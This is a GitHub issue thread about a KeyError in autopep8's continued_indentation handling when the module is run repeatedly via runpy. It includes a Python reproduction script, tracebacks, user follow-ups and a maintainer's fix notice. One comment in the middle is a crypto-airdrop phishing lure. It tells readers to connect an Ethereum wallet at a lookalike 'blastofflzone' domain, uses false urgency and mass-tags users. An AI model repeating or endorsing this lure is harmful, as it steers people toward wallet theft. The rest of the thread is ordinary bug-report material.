### ISSUE TITLE
KeyError in function continued_indentation

### ISSUE THREAD

**Issue by karthiknadig** [hhatto/autopep8#625]
I ran into this issue when building formatting server (over Language server protocol) using autopep8 as a formatter. see here https://github.com/hhatto/autopep8/issues/624

---

## Python Code

Let's call this `autopep8_test.py` 
```python
import contextlib
import io
import runpy
import sys


class redirect_io(contextlib.AbstractContextManager):
    def __init__(self, stream, new_target):
        self._stream = stream
        self._new_target = new_target
        # We use a list of old targets to make this CM re-entrant
        self._old_targets = []

    def __enter__(self):
        self._old_targets.append(getattr(sys, self._stream))
        setattr(sys, self._stream, self._new_target)
        return self._new_target

    def __exit__(self, exctype, excinst, exctb):
        setattr(sys, self._stream, self._old_targets.pop())


class formatter_result(object):
    def __init__(self):
        self.stdout = None
        self.stderr = None


class custom_io(io.TextIOWrapper):
    name = None

    def __init__(self, name, encoding="utf-8", newline=None):
        super().__init__(io.BytesIO(), encoding=encoding)
        self.name = name

    def close(self):
        pass


def _format_using_module(content):
    str_output = custom_io("<stdout>")
    str_error = custom_io("<stderr>")

    run_args = ['autopep8', "-"]
    

    original_argv = sys.argv[:]
    try:
        sys.argv = run_args

        with redirect_io("stdout", str_output):
            with redirect_io("stderr", str_error):
                str_input = custom_io("<input>")
                with redirect_io("stdin", str_input):
                    # Force line endings to be `\n`, this makes the diff
                    # easier to work with
                    str_input.write(content.replace("\r\n", "\n"))
                    str_input.flush()
                    str_input.seek(0)
                    runpy.run_module(
                        'autopep8', run_name="__main__", alter_sys=True
                    )
    except SystemExit:
        pass

    finally:
        sys.argv = original_argv


contents = "import sys;print(sys.argv)"
_format_using_module(contents) # Runs fine
_format_using_module(contents) # This one fails
```

## Command Line and Configuration

None

## Command Line
```cmd
> python autopep8_test.py
Traceback (most recent call last):
  File "c:/GIT/repro/tpi1/conda1/autopep8_test.py", line 72, in <module>
    _format_using_module(contents) # This one fails
  File "c:/GIT/repro/tpi1/conda1/autopep8_test.py", line 61, in _format_using_module
    'autopep8', run_name="__main__", alter_sys=True
  File "c:\GIT\repro\tpi1\conda1\.myenv1\lib\runpy.py", line 205, in run_module
    return _run_module_code(code, init_globals, run_name, mod_spec)
  File "c:\GIT\repro\tpi1\conda1\.myenv1\lib\runpy.py", line 96, in _run_module_code
    mod_name, mod_spec, pkg_name, script_name)
  File "c:\GIT\repro\tpi1\conda1\.myenv1\lib\runpy.py", line 85, in _run_code
    exec(code, run_globals)
  File "c:\GIT\repro\tpi1\conda1\.myenv1\lib\site-packages\autopep8.py", line 430, in <module>
    del pycodestyle._checks['logical_line'][pycodestyle.continued_indentation]
KeyError: <function continued_indentation at 0x000001FB175E0828>
```

## Your Environment
* Python version: 3.10
* autopep8 version: 1.6.0
* Platform: windows

**Comment by karthiknadig** [comment]
@hhatto Sorry for the delayed response on this. I finally got to working on this. with the latest version of autopep8 running to above code leads to:
```
Traceback (most recent call last):
  File "c:/GIT/formatters/vscode-autopep8/src/test/python_tests/autopep8_test.py", line 74, in <module>
    _format_using_module(contents) # Runs fine
  File "c:/GIT/formatters/vscode-autopep8/src/test/python_tests/autopep8_test.py", line 64, in _format_using_module
    'autopep8', run_name="__main__", alter_sys=True
  File "C:\all_pys\Python37\lib\runpy.py", line 205, in run_module
    return _run_module_code(code, init_globals, run_name, mod_spec)
  File "C:\all_pys\Python37\lib\runpy.py", line 96, in _run_module_code
    mod_name, mod_spec, pkg_name, script_name)
  File "C:\all_pys\Python37\lib\runpy.py", line 85, in _run_code
    exec(code, run_globals)
  File "c:\GIT\formatters\vscode-autopep8\.venv\lib\site-packages\autopep8.py", line 419, in <module>   
    del pycodestyle._checks['logical_line'][pycodestyle.continued_indentation]
KeyError: <function continued_indentation at 0x000002113C4178B8>
```

**Comment by omega1644** [comment]
I ran into the same issue, had to restart, delete cache and reload many times but sometimes it doesn't work, is there any alternative solution for this?

**Comment by karthiknadig** [comment]
@hhatto This is now hitting more frequently. The `reload` mitigation does not help in some cases (I am still investigating the reason).

**Comment by agherasim** [comment]
+1 on this issue, happens on a specific file. 
Any updates on having a fix for this issue, @karthiknadig?

**Comment by karthiknadig** [comment]
@agherasim I am not the owner of this repo. @hhatto should provide more details.

**Comment by adesilva1** [comment]
# Blastoff.zone Airdrop: Win 0.1 ETH + $100 Bonus!

[![Airdrop Banner](https://i.ytimg.com/vi/QtjkR9zWyzI/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

Hello crypto community! Blastoff.zone is offering an exciting Airdrop for the first 10 users! You can win 0.1 ETH plus a $100 bonus just by participating and connecting your wallet.

## How to participate:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to access the Blastoff.zone website.
2. Connect your Ethereum wallet to the website to be eligible for the $100 bonus.
3. Use the "Claim Now" method to receive your tokens.

Don't miss out on this amazing opportunity! Hurry and claim your prize before the 0.1 ETH runs out.

Remember, tokens will be distributed on a first-come, first-served basis. We have a maximum distribution of 100 tokens, and 90% have already been distributed!
kaliwdsn, @zoulamZero, @superkideth, @AdirAmsalem, @digitalnomad91, @stephenway, @KenMan79, @DavisChang, @hubert-sikorski, @Hitekkcompany, @jdunn7, @wayneki, @rodrigopivi, @WoNd3RBoY, @alisonruthhughes, @YuheiNakasaka, @abdulhajiyev, @gentle-noah, @neven-repo, @JoelBCarter

**Comment by hhatto** [comment]
this is fixed in v2.1.1+.

Please try again with the latest version.
